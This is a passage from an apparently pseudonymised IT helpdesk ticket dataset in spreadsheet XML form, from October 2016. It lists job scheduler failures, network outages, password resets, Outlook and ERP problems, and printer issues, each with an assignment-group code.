    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job SID_37cold failed in job_scheduler at: 10/23/2016 00:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37cold failed in job_scheduler at: 10/23/2016 00:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job bkbackup_tool_sql_prod_full failed in job_scheduler at: 10/23/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_sql_prod_full failed in job_scheduler at: 10/23/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="pinovmqw icafkqmw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bk_hana_SID_62_erp_wly_dp failed in job_scheduler at: 10/22/2016 23:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_62_erp_wly_dp failed in job_scheduler at: 10/22/2016 23:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="switch down - apac-company-rpmwh-2960s-access-sw01 located at apac is down since 10/22/2016 7:47 pm"/>
    <s v="switch down - apac-company-rpmwh-2960s-access-sw01 located at apac is down since 10/22/2016 7:47 pm"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="inquiry on expense report-erp"/>
    <s v="inquiry on expense report-erp"/>
    <s v="eqwaiphc qxwfeuth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkbackup_tool_powder_prod_full failed in job_scheduler at: 10/22/2016 18:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_powder_prod_full failed in job_scheduler at: 10/22/2016 18:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bkbackup_tool_powder_prod_full failed in job_scheduler at: 10/22/2016 18:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_powder_prod_full failed in job_scheduler at: 10/22/2016 18:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_480 failed in job_scheduler at: 10/22/2016 17:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_480 failed in job_scheduler at: 10/22/2016 17:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job bkbackup_tool_sql_prod_full failed in job_scheduler at: 10/22/2016 17:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_sql_prod_full failed in job_scheduler at: 10/22/2016 17:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_466 failed in job_scheduler at: 10/22/2016 17:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_466 failed in job_scheduler at: 10/22/2016 17:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_482 failed in job_scheduler at: 10/22/2016 17:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_482 failed in job_scheduler at: 10/22/2016 17:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job bkbackup_tool_o365_primary_prod_full failed in job_scheduler at: 10/22/2016 17:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_o365_primary_prod_full failed in job_scheduler at: 10/22/2016 17:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_581 failed in job_scheduler at: 10/22/2016 16:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_581 failed in job_scheduler at: 10/22/2016 16:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="HostName_804: c:\ disk volume is over 85% space consumed."/>
    <s v="HostName_804: c:\ disk volume is over 85% space consumed.. space available: 4.4 g"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job bwdpmbkp failed in job_scheduler at: 10/22/2016 12:58:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwdpmbkp failed in job_scheduler at: 10/22/2016 12:58:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="HostName_1345 server is offline"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hpqjaory.gfrwmije@gmail.com_x000d__x000a__x000d__x000a_we are experiencing an interruption in our systems involved with server HostName_1345._x000d__x000a_most of the network printers are not operational due to this problem._x000d__x000a__x000d__x000a_please advise._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="hpqjaory gfrwmije"/>
    <x v="3"/>
  </r>
  <r>
    <s v="network outage : south_amerirtca  ktthasb site is hard dwon since 11:52 am on 21/10 et "/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __11:52 am on 21/10 et _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x v="7"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="eboutzmn umzvbkfh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the terminate action for kmzucxgq vjzfocgt has completed."/>
    <s v="from: _x000a_sent: saturday, october 22, 2016 6:29 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: the terminate action for kmzucxgq vjzfocgt has completed._x000a__x000a_hello , _x000a__x000a_a termination for kmzucxgq vjzfocgt, 2s76891111595, effective 83.69.48.194 has been approved. _x000a__x000a_"/>
    <s v="ljpgedia bzqcwsgf"/>
    <x v="19"/>
  </r>
  <r>
    <s v="problems with the data model in excel"/>
    <s v="_x000a__x000a_received from: bwfhtumx.japznrvb@gmail.com_x000a__x000a_i cannot get the data model to work in my excel_x000a__x000a_[cid:image001.jpg@01d22c57.57e6dc10]_x000a__x000a_[cid:image002.jpg@01d22c57.57e6dc10]_x000a__x000a_bwfhtumx japznrvb_x000a_regional controller_x000a_bwfhtumx.japznrvb@gmail.com&lt;mailto:bwfhtumx.japznrvb@gmail.com&gt;_x000a_"/>
    <s v="bwfhtumx japznrvb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="eboutzmn umzvbkfh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_500 failed in job_scheduler at: 10/22/2016 06:08:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_500 failed in job_scheduler at: 10/22/2016 06:08:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1422 failed in job_scheduler at: 10/22/2016 05:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1422 failed in job_scheduler at: 10/22/2016 05:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/22/2016 04:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/22/2016 04:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="power outage : engineering_toolkuznetsk warehouse, russia - (company) network is down since 2:48am et on 10/22/16"/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________2:48am et on 10/22/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no_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____no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job bkwin_infonet1_full failed in job_scheduler at: 10/22/2016 01:42:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_infonet1_full failed in job_scheduler at: 10/22/2016 01:42:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="outlook not working "/>
    <s v="_x000d__x000a__x000d__x000a_received from: dceoufyz.saufqkmd@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_my outlook app on my laptop isn't opening._x000d__x000a__x000d__x000a_"/>
    <s v="dceoufyz saufqkmd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1345 server: beeping sound in the server"/>
    <s v="HostName_1345 server beeping sound in the server"/>
    <s v="xpoqcrtb zwrypjqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0451791"/>
    <s v="ticket update on ticket_no0451791"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa - (company):company-na-usa-usa-2950-core-sw02 went down at 5:51 pm et on 10/21."/>
    <s v="usa - (company):company-na-usa-usa-2950-core-sw02 went down at 5:51 pm et on 10/21._x000d__x000a_gigabitethernet0/2 interface down on company-na-usa-usa-2950-core-sw02 ._x000d__x000a_company-na-usa-usa-2950-access-sw01 went down at 7:44 pm et on 10/21,gigabitethernet1/1/4 interface down "/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="circuit outage:usa pa, company-ctc-dr-vpn-rtr.company.com went down at 6:10 pm et on 10/21. "/>
    <s v="what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____ 6:10 pm et on 10/21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after my bios was update, i can no longer log in to erp"/>
    <s v="i get an error every time that i try to log into erp i get a log balancing error 88. could not connect to message server"/>
    <s v="ypetnhio ouhlpvig"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to erp "/>
    <s v="unable to connect to erp "/>
    <s v="ljodkepq dsifumxl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access etime through ie"/>
    <s v="password prompt resulting in an unauthorized access error."/>
    <s v="yxsermtd vloueirh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1325 has a drive that is flashing yellow. message display is also flashing on and off, although it has no error."/>
    <s v="please check HostName_1325  (shop_floor_app server) drive for possible problems. one of the drives is flashing yellow."/>
    <s v="zbhfrsto vhgtoxib"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa and usa - perhaps other sites as well.  outlook refusing to send reply emails."/>
    <s v="usa and usa - perhaps other sites as well.  many users - outlook refusing to send reply emails.  a new email will send, but a reply will stall and outlook freezes with a not reponding error. this appears to be happening only with office 2010, i personally am using office 2016.  got many complaints from usa and complaints from usa mi as well. suspect a systemic problem company wide. "/>
    <s v="slzhuipc sqntcber"/>
    <x v="26"/>
  </r>
  <r>
    <s v="access denied : "/>
    <s v="access denied : collaboration_platform_x000a__x000a__x000a__x000a_check screenshots in email attachment._x000a__x000a_could you please reviewing the alejayhsdtffndro's profile on collaboration_platform? in the functions menu, alejayhsdtffndro chose the finance option but receive the message &quot;access denied&quot;. alejayhsdtffndro's is controller in mexico. please see the screenshots below:_x000a__x000a_"/>
    <s v="mxzcjhpi pnelahdw"/>
    <x v="15"/>
  </r>
  <r>
    <s v="jpg files encrypted "/>
    <s v="jpg files encrypted "/>
    <s v="gpdywmbt pmxfiqkl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset password"/>
    <s v="_x000a__x000a_received from: bihfazru.bhjqvtzm@gmail.com_x000a__x000a_hello, i locked myself out of erp. can you reset my password?_x000a__x000a_thesdf sdlwfkvach_x000a_production supervisor_x000a_bihfazru.bhjqvtzm@gmail.com&lt;mailto:bihfazru.bhjqvtzm@gmail.com&gt;_x000a__x000a_[cid:image003.jpg@01cfcb3e.29ec32f0]_x000a__x000a_"/>
    <s v="bihfazru bhjqvtzm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="terminated employees "/>
    <s v="_x000a__x000a_received from: tsicojkp.kghaozew@gmail.com_x000a__x000a_there is an employee that has been terminated 9/30/16 who still has access to company email on his personal device, aylrbosw gaeycbwd._x000a__x000a_tsicojkp kghaozew_x000a_commodity manager_x000a_tsicojkp.kghaozew@gmail.com&lt;mailto:tsicojkp.kghaozew@gmail.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="tsicojkp kghaozew"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not working"/>
    <s v="outlook not working"/>
    <s v="pxbzltkn fsediuyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlocked and reset erp SID_1"/>
    <s v="unlocked and reset erp SID_1"/>
    <s v="slkxgzdj wxpytevu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company center not pulling replacement item"/>
    <s v="company center is not pulling replacement items when they are available.  _x000d__x000a_material 3976391 in company center is a pre-obsolete with replacement - the diaolog box is not displaying the replacement - vb13 is populated mm# 6984824_x000d__x000a_."/>
    <s v="vbmzgsdk jdmyazti"/>
    <x v="12"/>
  </r>
  <r>
    <s v="vip 1: erp account locked for user janhduh keehad8fvkgaalen"/>
    <s v="vip 1: erp account locked for user janhduh keehad8fvkgaalen"/>
    <s v="lpoebzsc grknswyo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook freezing for all users"/>
    <s v="outlook freezing for all users"/>
    <s v="bdeplqyj fewovrcq"/>
    <x v="3"/>
  </r>
  <r>
    <s v="outlook/crm plug in issue"/>
    <s v="_x000a__x000a_received from: tskvmwag.awkrdqzb@gmail.com_x000a__x000a_hello,_x000a_crm plug in buttons are not staying checked when i close outlook. i lose the crm function in my outlook when i close the programdnty._x000a_please see attached screen shot._x000a__x000a__x000a_tskvmwag awkrdqzb_x000a_sr. sales engineer  nc3_x000a_north central region_x000a_tskvmwag.awkrdqzb@gmail.com&lt;mailto:tskvmwag.awkrdqzb@gmail.com&gt;_x000a__x000a_"/>
    <s v="tskvmwag awkrdqzb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer prtqx4580 won't print for anyone in our office."/>
    <s v="_x000d__x000a__x000d__x000a_received from: gqkedvzu.czoniyra@gmail.com_x000d__x000a__x000d__x000a_"/>
    <s v="gqkedvzu czoniyra"/>
    <x v="2"/>
  </r>
  <r>
    <s v="password error in erp"/>
    <s v="_x000a__x000a_received from: ivohcdpw.ixcanwbm@gmail.com_x000a__x000a_dear sir,_x000a__x000a_please help me in erp login ._x000a__x000a_user id -dwivethn677_x000a__x000a__x000a_with best "/>
    <s v="ivohcdpw ixcanwbm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business partner id - bertsckaadyd122"/>
    <s v="_x000a__x000a_received from: inxsupmy.zhwmifvx@gmail.com_x000a__x000a_hello team,_x000a__x000a_can you please create a business partner id for â€“ bertsckaadyd122 in solution manager ._x000a__x000a_inxsupmy zhwmifvx_x000a_team lead -  (sourcing &amp; logistics) - global it_x000a_inxsupmy.zhwmifvx@gmail.com_x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="inxsupmy zhwmifvx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="missed call"/>
    <s v="missed call"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="id 04637"/>
    <s v="id 04637 printer have paper stuck up issue."/>
    <s v="ongumpdz pjkrfmbc"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ms outlook network error messages"/>
    <s v="when searching in inbox the following message is received due to current network conditions, some results may not be included in your search"/>
    <s v="dctviemg muapxkns"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype error while logging in "/>
    <s v="skype error while logging in "/>
    <s v="itslpwra vybdkuoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000a__x000a_enter user id of user having the issue: moranm_x000a__x000a_transaction code(s) the user needs or was working with: cv04n_x000a__x000a_describe the issue:_x000a__x000a_csr mdwydindy mwdlkloran currently does not have access to view drawings.  please upgrade her access as this is a necessary requirement for all csrs on the company team. _x000a__x000a_provide access the same as this other user: yrlsguzk fasyiokl"/>
    <s v="amunklhx bvrachko"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to open .xml files on the computer"/>
    <s v="unable to open .xml files on the computer"/>
    <s v="wbqtfzdv aectbluw"/>
    <x v="2"/>
  </r>
  <r>
    <s v="skype problem"/>
    <s v="_x000a__x000a_received from: gdnwlkit.jokidavy@gmail.com_x000a__x000a_yesterday i had some problems with outlook after a password change. the problem was crm. a new version was loaded and i thought my troubles were over_x000a_now, my skype for business is not working and i could not join an important meeting this morning. a copy of the skype screen is below. is the sign-in address correct? if not, what should it be. have emailed this because the telephone help line hangs up on you as soon as you select a number to direct the call._x000a__x000a__x000a__x000a_[cid:image001.jpg@01d22b77.b8773b50]_x000a__x000a_tjwdhwdw tdlwdkunis_x000a_senior sales engineer team_x000a_gdnwlkit.jokidavy@gmail.com&lt;mailto:gdnwlkit.jokidavy@gmail.com&gt;_x000a__x000a_"/>
    <s v="gdnwlkit jokidavy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="help line phone problem"/>
    <s v="_x000a__x000a_received from: gdnwlkit.jokidavy@gmail.com_x000a__x000a_please note. when dialing into the help line, as soon as you make a selection (1,2, or 3) it hangs up on you , terminating the call._x000a__x000a_tjwdhwdw tdlwdkunis_x000a_senior sales engineer teamgdnwlkit.jokidavy@gmail.com&lt;mailto:gdnwlkit.jokidavy@gmail.com&gt;_x000a__x000a_"/>
    <s v="gdnwlkit jokidavy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype"/>
    <s v="_x000d__x000a__x000d__x000a_received from: yiramdntyjqc.qtrcepsa@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i am having trouble accessing skype. i keep getting cut-off when i select from the phone menu. hope this gets through._x000d__x000a_"/>
    <s v="yiramjqc qtrcepsa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my pc don`t work with wifi"/>
    <s v="_x000d__x000a_i have wifi, but my computer does not work with wifi only works with telecom_vendor_4, telecom_vendor_4 it is a gsm suplier with g4"/>
    <s v="syhmgdvf jqamflty"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="information on previous tickets"/>
    <s v="name:slrgconp onukdesq_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:slrgconp.onukdesq@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i opened a ticket this morning.  who is it assigned to"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email address in purchasing"/>
    <s v="from: dpuifqeo eglwsfkn _x000a_sent: friday, october 21, 2016 6:19 pm_x000a_to: nwfodmhc exurcwkm; shkdwd dlwdwd_x000a_cc: dfetvmzq brxavtzp_x000a_subject:  re: purchasing dfetvmzq brxavtzp _x000a__x000a_the email address on this profile is incorrect â€“ please change to dfetvmzq.brxavtzp@gmail.com_x000a_also need to add the company catalog to her profile_x000a__x000a_"/>
    <s v="dfetvmzq brxavtzp"/>
    <x v="19"/>
  </r>
  <r>
    <s v="reset the password for jgxmafwk mlroijfp on erp / production / hcm"/>
    <s v="i am new to erp and have had no training at all._x000d__x000a_would you please call me and walk me through login? or at least verify my login name and password? please and "/>
    <s v="jgxmafwk mlroijfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook indexing error "/>
    <s v="_x000d__x000a__x000d__x000a_received from: egjwxhlo.weofysln@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a_i used to be able to see what i search in outlook within pdf attachments, but after the upgrade i cannot search within pdf attachment in my mailbox._x000d__x000a_can you please advise?_x000d__x000a__x000d__x000a_"/>
    <s v="egjwxhlo weofysln"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 erp production password reset"/>
    <s v="erp SID_34 erp production password reset"/>
    <s v="mreocsnk swoyxzma"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ethics login error"/>
    <s v="when i try to login to ethics training, i click on the log in from the collaboration_platform site, it takes me to the page to select language, i click on engilsh. then i get an error that says the page failed to load."/>
    <s v="kiqfusgp xfzsreug"/>
    <x v="0"/>
  </r>
  <r>
    <s v="old ticket no.inc1553707. usa access for configuring outlook exchange on windows phone"/>
    <s v="usa access for configuring outlook exchange on windows phone. approval is attached with this ticket._x000d__x000a__x000d__x000a_"/>
    <s v="ytwmgpbk cpawsihk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="interface: gigabitethernet1/0/40 Â·shopfloor_111_schuette_01 on company-eu-deu-germany-emsw03-2960s-access-sw03 is down"/>
    <s v="gigabitethernet1/0/40 Â· shopfloor_111_schuette_01 on company-eu-deu-germany-emsw03-2960s-access-sw03 is down since "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="reset passwords for qkgnwxto dwtivjrp using password_management_tool password reset."/>
    <s v="cannot log into hiatchi password manager, to change to new password."/>
    <s v="qkgnwxto dwtivjrp"/>
    <x v="16"/>
  </r>
  <r>
    <s v="password reset request."/>
    <s v="password reset request."/>
    <s v="zymdwqsi jzvbthil"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my external monitor will not come on this morning."/>
    <s v="my external monitor will not come on this morning."/>
    <s v="bcaxeuvh rgiqfavb"/>
    <x v="2"/>
  </r>
  <r>
    <s v="delivery issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: acmglkti.cwgxrabu@gmail.com_x000d__x000a__x000d__x000a_good morning_x000d__x000a__x000d__x000a_we have urgent need for assistance as customer is awaiting parts for mm#7233365, please give this matheywter a high priority_x000d__x000a__x000d__x000a_however,_x000d__x000a__x000d__x000a_we have experienced a glitch in creating delivery for sales order#35045813.  the delivery #9169662470 created for 0 pcs., there is balance due of 195 pcs. , but we can not change delivery  quantity nor can we delete delivery.  we did not pgi the delivery when created, and the delivery is still showing in md04, but when we try to make changes there is an error that the delivery has been posted.  we have tried to unpost (vl19) delivery but we are getting message stating that delivery has already been inwarehouse_toold,  but in all reality the delivery is frozen in erp and no changes can be made._x000d__x000a__x000d__x000a_"/>
    <s v="acmglkti cwgxrabu"/>
    <x v="17"/>
  </r>
  <r>
    <s v="company.com not working : dns issue "/>
    <s v="company.com not working : dns issue "/>
    <s v="iqthfjvx qkpgrfzx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="customer catalogue and collaboration_tool is not working."/>
    <s v="customer catalogue and collaboration_tool is not working."/>
    <s v="dtisfuyp fpvrjlkz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to call in"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lomzfqns.htznsgdf@gmail.com_x000d__x000a__x000d__x000a_fyi..._x000d__x000a__x000d__x000a_tried calling in this morning. no matheywter which option i select, i'm immediately disconnected._x000d__x000a__x000d__x000a_"/>
    <s v="lomzfqns htznsgdf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to netweaver"/>
    <s v="_x000a__x000a_received from: fgljepar.xpsarwiz@gmail.com_x000a__x000a_good morning,_x000a_please give yhrdw hdld3geman access to netweaver._x000a_questions?_x000a_thanx123,_x000a_jwbsdd2 ddmefoche_x000a_sr. applications engineer_x000a__x000a_fgljepar.xpsarwiz@gmail.com&lt;mailto:fgljepar.xpsarwiz@gmail.com&gt;_x000a__x000a_"/>
    <s v="bitdmacs kumdiywz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lean tracker issues"/>
    <s v="_x000a__x000a_received from: vtwxaefm.ljisafue@gmail.com_x000a__x000a_hello ,_x000a_i am getting error when trying to create a new lean tracker number. attached the screenshot of the error._x000a_need your help to resolve it._x000a__x000a_[cid:image002.jpg@01d22bc1.3d0d9af0]_x000a__x000a_"/>
    <s v="vtwxaefm ljisafue"/>
    <x v="0"/>
  </r>
  <r>
    <s v="shared mailbox not updating activities"/>
    <s v="shared mailbox not updating activities"/>
    <s v="tqpbazxm jhbkycgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot get into my computer, get an error no ip address"/>
    <s v="i cannot get into my computer, get an error no ip address"/>
    <s v="ubqjihpt pzrjxmgd"/>
    <x v="2"/>
  </r>
  <r>
    <s v="account locked in erp SID_34"/>
    <s v="account locked in erp SID_34"/>
    <s v="wvqgbdhm fwchqjor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="would you please reset my erp hcm password? i'm locked out of it..thanks!"/>
    <s v="would you please reset my erp hcm password? i'm locked out of it.."/>
    <s v="qpkbiwzl urypnjvq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook and skype not responding."/>
    <s v="outlook and skype not responding."/>
    <s v="ewvugfcy nxbdajgh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="drucker in lÃ¶we uacyltoe hxgayczeraum knicrhtyt papier \dtlmbcrx mwuateyx"/>
    <s v="drucker in lÃ¶we uacyltoe hxgayczeraum knicrhtyt papier \dtlmbcrx mwuateyx"/>
    <s v="dtlmbcrx mwuateyx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="benÃ¶tige zugriff auf schichtplaner"/>
    <s v="bitte zugriff auf folgenden pfad einrichten: departments (\\HostName_737)(m:) --&gt; programdntyme --&gt; schichtplaner_x000a__x000a_user: freybtrhsdl "/>
    <s v="svelutaj nguzrmec"/>
    <x v="33"/>
  </r>
  <r>
    <s v="HostName_113: plm plot / view (production_order_interface_app) rfcserver.exe process count(critical)"/>
    <s v="HostName_113: plm plot / view (production_order_interface_app) rfcserver.exe process count(critical)"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="password no more valid. new password to access to erp SID_34 erp production"/>
    <s v="password no more valid. new password to access to erp SID_34 erp production"/>
    <s v="lpfzasmv cleoprzq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reinstall hardcopy und EU_tool \lndypaqg dhqwtcsr"/>
    <s v="reinstall hardcopy und EU_tool \lndypaqg dhqwtcsr"/>
    <s v="lndypaqg dhqwtcsr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="help to install erp in computer lpawhdt8515494"/>
    <s v="hi team,_x000a__x000a_could you please, help me to reinstall erp 7.40 in computer the an user. _x000a__x000a_computer: lpawhdt8515494_x000a__x000a_please contatc me, if you have more doubt._x000a__x000a_tnks_x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" expedite mm3516492 mm2405383"/>
    <s v="hiï¼Œteam_x000a_pls. help to run out dn against sto#5019358024, 3516494*37pcs,customer need them urgently~_x000a_thx a lot!_x000a__x000a_b.rgds_x000a_wswdd.djdwol_x000a_company hardpoint apacc_x000a__x000a_"/>
    <s v="wktesmbp lorjymef"/>
    <x v="5"/>
  </r>
  <r>
    <s v="we111 gibt nur eine fehlermeldung aus"/>
    <s v="we111 gibt nur eine fehlermeldung aus :_x000d__x000a_anmelden im netzwerk_x000d__x000a_registrieren der netzwerkeinstellungen._x000d__x000a_nicht alle vorgÃ¤nge kÃ¶nnen erledigt werden._x000d__x000a_warten sie einen moment \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="pc slow"/>
    <s v="my pc is responding slow. can the pc team please check to speed it up further._x000d__x000a_i am looking for disk fragmentation or similar type of activity which will help pc perform its activitiess faster."/>
    <s v="nrugzxkl lohqkvry"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/21/2016 05:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/21/2016 05:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="trigger loads for bw - fill rate recovery-kba for oct 19th 2016"/>
    <s v="trigger loads for bw - fill rate recovery-kba for oct 19th 2016"/>
    <s v="vthuzanc fqdgotvx"/>
    <x v="8"/>
  </r>
  <r>
    <s v="lable drucker funktioniert nicht"/>
    <s v="lable drucker in der endkontrolle defense gibt keine etiketten aus"/>
    <s v="vpnraqfk pgocqjbu"/>
    <x v="32"/>
  </r>
  <r>
    <s v="job bk_biaprod failed in job_scheduler at: 10/21/2016 05:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_biaprod failed in job_scheduler at: 10/21/2016 05:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="rechner fÃ¼r lÃ¤ngenmessmaschine uacyltoe hxgayczeen \xosdfhbu gtbfkisl"/>
